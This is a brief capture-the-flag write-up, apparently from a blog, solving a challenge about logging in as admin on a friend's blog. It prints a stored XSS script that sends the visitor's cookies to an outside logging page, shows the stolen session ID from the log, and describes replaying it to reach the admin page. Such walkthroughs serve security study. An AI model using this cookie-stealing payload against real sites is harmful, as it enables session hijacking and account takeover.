Description:
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The BlogSolution:
1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to Cross-site Scripting (XSS)
2. Description tell me "want to login as admin", I custom JavaScript to steal a admin's cookie and put to comment.
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script>
3. Wait a minute and give some cookie in my site's access log.
/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82
4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie
Flag: 1b7a60600d5731739c0e2115bd4ebf7c
ไม่มีความคิดเห็น:
แสดงความคิดเห็น